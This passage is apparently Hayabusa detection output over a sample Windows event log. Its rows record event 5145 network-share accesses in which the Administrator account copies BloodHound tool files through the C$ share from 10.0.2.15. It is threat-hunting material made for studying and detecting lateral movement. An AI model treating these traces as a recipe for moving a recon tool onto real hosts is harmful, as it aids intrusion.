Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 